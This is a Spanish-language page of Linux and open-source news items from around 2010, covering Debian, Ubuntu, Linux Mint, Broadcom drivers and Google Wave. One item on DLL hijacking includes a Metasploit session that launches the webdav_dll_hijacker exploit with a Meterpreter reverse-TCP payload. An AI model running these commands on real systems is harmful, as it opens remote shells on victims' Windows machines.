UNIX – *BSD – GNU/Linux
Nueva versión de LFS, un proyecto que te permite desarrollar paso a paso un sistema GNU/Linux, desde cero y manualmente. Nada que ver con las facilidades de las actuales distribuciones precompiladas al alcance de cualquier usuario, Linux From Scratch está destinado a usuarios avanzados aunque a cambio permite construir un sistema compacto y flexible, proporcionando de paso un gran conocimiento del mismo.
Los chips inalámbricos de Broadcom se utilizan de forma masiva en multitud de ordenadores portátiles, y ahora la compañía ha decidido abrir el código de sus controladores al Open Source, algo que supone una gran noticia para los usuarios del sistema operativo Linux.
Aunque por el momento los controladores de sus chipsets inalámbricos están en desarrollo en su versión Open Source, disponer del código fuente de dichos chipsets permitirá ofrecer compatibilidad hardware nativa en Linux.
Hace tiempo que hablamos del problema que había surgido entre Android y el kernel Linux, y que se centraba en el hecho de que algunos de los controladores presentes en Android -para dar soporte a la enorme cantidad de dispositivos que están gobernados por la plataforma de Google- no fueron aceptados por Linus Torvalds para su inclusión en el kernel Linux, lo que provocó la separación de ambas ramas de desarrollo.
Los desarrolladores de Linux Mint han anunciado la llegada de una edición Debian de su distribución Linux Mint, que como su propio nombre indicasustituye la base tradicional de Ubuntu para pasar a basarse en la ramaDebian testing.
Una de las novedades del navegador web Open Source Chromium es la presencia de un nuevo cuadro de diálogo que aparece cuando instalamos nuevas versiones -por ejemplo, ocurre cuando actualizamos Ubuntu o instalamos la nueva versión Ubuntu 10.10 Beta- y que nos pregunta qué motor de búsqueda queremos usar.
La aparición de Ubuntu 10.10 Maverick Meerkat Beta ha supuesto el pistoletazo de salida definitivo para Ubuntu 10.10, y de hecho algunos usuarios ya se han puesto manos a la obra para ofrecernos unos widgets que podemos añadir a nuestros blogs y que ayudan a recordar cuántos días quedan para esa versión final, que como sabéis llegará el 10 de octubre de 2010.
Los desarrolladores de Debian han relanzado Debian 5.0 ‘Lenny’ -quizás deberían llamarla 5.1- avisando de que no se trata de una nueva versión de la distribución, sino simplemente la misma que conocíamos pero con una serie de nuevos paquetes que entre otras cosas corrigen vulnerabilidades de seguridad.
Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.
Abrimos metasplit
rokitoh@red-orbita# msfconsolemsf > use exploit/windows/browser/webdav_dll_hijackermsf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»EXTENSIONS => grp p7c vcf wabmsf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111lhost => 192.168.1.111msf exploit(webdav_dll_hijacker) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.111:4444[*][*] Exploit links are now available at \192.168.1.111documents[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.111:80/
Continuando con los nombres sacados de la película Toy Story para llamar a las versiones de Debian, nos enteramos por las listas de correo de que la versión 7 llevará el nombre del pingüino con corbata roja de la película: Wheezy(aunque no salía en Toy Story 1).
Poco más que decir. La congelación de la versión 6 “Squeeze” sigue su curso y en el mail podemos encontrar las directrices que marcan el subir o no nuevos paquetes a Sid, y su posible inclusión en Squeeze.
Google ha anunciado el lanzamiento del proyecto “Wave in a Box”, una versión Open Source independiente y totalmente funcional de su desarrollo de mensajería y colaboración recientemente cancelado, Google Wave.
La empresa afirma que ya ha abierto 200.000 líneas de código como parte del desarrollo del protocolo Wave, y planea expandir esa apertura a un servidor de prueba que lanzará para ofrecer una “aplicación más completa”. Grandes noticias para los que querían seguir usando Wave.